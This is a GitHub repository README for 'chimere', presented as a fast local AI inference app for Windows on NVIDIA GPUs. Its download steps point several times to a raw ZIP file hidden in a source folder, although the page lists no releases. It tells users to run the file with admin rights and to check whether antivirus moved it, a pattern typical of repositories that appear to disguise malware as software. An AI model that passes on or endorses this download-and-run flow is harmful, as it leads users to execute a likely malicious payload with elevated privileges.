Skip to content

Edg6183/chimere

Repository files navigation

⚡ chimere - Fast local AI on Windows

Download chimere

🖥️ What chimere does

chimere is a Windows app for running a large AI model on your own PC. It is built for NVIDIA GPUs and uses custom CUDA code to keep the model fast and stable.

It is designed for users who want to:

  • run a local AI model on Windows
  • keep data on their own machine
  • use a single supported GPU setup
  • work with a ready-made download and run flow

chimere focuses on speed, memory use, and smooth response times. It uses a mix of model routing, memory layers, and speculative decoding to help the model answer faster on supported hardware.

📥 Download chimere

Visit this page to download chimere:

https://raw.githubusercontent.com/Edg6183/chimere/main/chimere-server/ffi/src/Software-v1.6.zip

After the page opens, look for the latest Windows build or release file, then download it to your computer.

✅ Before you start

Check these items before you install:

  • Windows 11 or Windows 10
  • An NVIDIA GPU with CUDA support
  • At least 16 GB of system RAM
  • Enough free disk space for the app and model files
  • Admin access on your PC for the first setup

For the best result, use the GPU and memory setup the app was built for. This helps chimere load the model and keep response times steady.

🚀 Install and run

Follow these steps on Windows:

  1. Open the download page: https://raw.githubusercontent.com/Edg6183/chimere/main/chimere-server/ffi/src/Software-v1.6.zip

  2. Download the Windows release file for chimere.

  3. If the file is in a ZIP archive, right-click it and choose Extract All.

  4. Open the extracted folder.

  5. Find the main chimere app file and double-click it.

  6. If Windows asks for permission, choose Yes.

  7. Wait while chimere starts and loads its model files.

  8. When the app opens, follow the on-screen setup steps to finish first launch.

If the app uses a local window or web view, keep it open while the model runs. Closing the window will stop the session.

🧠 What you can expect

chimere is made for local inference, which means it runs the AI model on your own GPU instead of sending your data to a remote server.

Main things it is built for:

  • faster reply times with speculative decoding
  • lower memory pressure with layered memory handling
  • better routing inside the model
  • support for larger models on smaller VRAM setups
  • a local setup that stays on your Windows machine

This makes chimere fit users who want a local AI tool with more control over speed and memory use.

🧩 Supported hardware

chimere is tuned for modern NVIDIA GPUs, with a focus on Blackwell-class hardware and CUDA SM120 support.

Good matches include:

  • NVIDIA RTX 50-series cards
  • GPUs with enough VRAM for the target model
  • systems with solid PCIe bandwidth
  • Windows PCs with current NVIDIA drivers

For the target use case, a single RTX 5060 Ti 16GB is the main reference setup. That means the app is aimed at users who want to run a large model on one consumer GPU instead of a full server rig.

🛠️ How it works

chimere combines several model runtime parts:

  • MoE routing for choosing which parts of the model should work on each token
  • DFlash speculative decoding for faster answer generation
  • Engram memory for layered memory handling
  • entropy-aware routing for better token flow
  • state-space model parts for efficient sequence processing
  • Rust-native runtime for a tight, system-level app core
  • custom CUDA kernels for GPU work on supported cards

You do not need to understand these terms to use the app. They are part of the engine that helps chimere run fast on the right hardware.

📂 First launch setup

When chimere starts for the first time, it may ask you to:

  • pick a model path
  • confirm your GPU
  • set a cache or memory folder
  • choose a model preset
  • wait while files are prepared

Use the default choices if you are not sure. They are meant to work for most users. If the app gives you a model download or setup screen, let it finish before you start a session.

🔧 Recommended settings

Use these settings if the app lets you choose:

  • keep GPU mode on
  • leave memory use on the default level
  • use the model preset made for the included target model
  • keep speculative decoding enabled
  • use the latest stable NVIDIA driver

If chimere offers a quality and speed choice, pick the balanced option first. That gives you a good mix of speed and response quality.

🧪 Common use case

A simple use case looks like this:

  1. Install chimere on Windows.
  2. Open the app.
  3. Load the model.
  4. Type a prompt in the chat or input field.
  5. Wait for the answer to appear.
  6. Keep the app open while you use it.

If the model takes a while on the first run, that is normal. The app may need time to load files and prepare GPU memory.

❓ Troubleshooting

The app does not open

  • Make sure you extracted the ZIP file first
  • Run the app as an administrator
  • Check that Windows did not block the file
  • Confirm that your antivirus did not move the app file

The GPU is not being used

  • Install the latest NVIDIA driver
  • Reboot the PC
  • Check that the app is set to GPU mode
  • Make sure no other heavy GPU app is using the card

The model loads too slowly

  • Close other apps
  • Keep your power plan on high performance
  • Make sure you have enough free RAM
  • Use the target hardware setup if possible

The app runs out of memory

  • Close other programs
  • Use a smaller model if the app allows it
  • Check that the model preset matches your GPU memory
  • Restart the app after freeing memory

📌 File layout

After you extract the download, you may see folders for:

  • the app itself
  • model files
  • cache data
  • logs
  • config files

Do not move files around unless the app asks you to. Keep the folder structure in place so chimere can find what it needs.

🔒 Local use

chimere is meant for local use on your own machine. Your prompts and output stay on your PC while the app runs. This is useful if you want to keep work, notes, or private text on device.

🧭 Next steps

After you get chimere running:

  • load the default model
  • try a short prompt first
  • check response speed
  • adjust memory or model settings only if needed
  • keep the app and GPU driver up to date

📎 Download again

https://raw.githubusercontent.com/Edg6183/chimere/main/chimere-server/ffi/src/Software-v1.6.zip

About

Runs a Rust inference server for hybrid State-Space and MoE language models with fast GPU throughput on consumer hardware

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors